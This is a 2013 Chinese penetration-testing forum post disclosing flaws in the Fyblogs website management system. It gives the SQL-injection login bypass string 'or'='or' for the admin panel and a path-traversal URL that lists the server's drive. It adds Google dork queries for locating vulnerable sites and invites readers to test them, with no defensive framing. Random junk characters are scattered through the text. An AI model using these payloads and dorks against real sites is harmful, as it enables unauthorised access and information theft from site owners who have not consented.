中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过& h( Z4 U. |* T7 r- y* U

6 o! l3 [- R3 q. t5 Z简要描述:
4 r# M; R8 q' R3 x3 D) g9 z+ ]- d4 N+ {3 v8 U- x
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!4 w: g, m2 f: i: @: c
7 g0 B. M$ k* S9 m1 D$ N
详细说明:, G" J: u% X6 B$ [  m' @  M5 _& _

, @" w& E! q) W% D6 y5 w后台万能密码 'or'='or'
/ g8 Y1 C4 t  i5 ~- O& H! C- ?后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: S0 K) d1 l) R1 Xadmin/uploadfile.asp?currentFolder=/upfiles/../+ a/ w. W, R& Z2 h
% R) F% N) K2 _
漏洞证明:1 {- [3 _* Y' s9 O( O
, x& G( V6 [5 h4 T# ~
谷歌:inurl:type.asp?id=1 新闻中心
8 D+ q+ a% S6 k" y6 r: H% Q: ]或者 :inurl:download_ok.asp?4 D% h7 }4 |: L" P0 S8 ~! f
- q5 W2 r' e% H0 L1 L
可以测试
8 R. e* n! c  h0 O; Y0 R7 c2 Y+ N1 ~7 S. l
! L& x" _3 F6 [( W- E





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2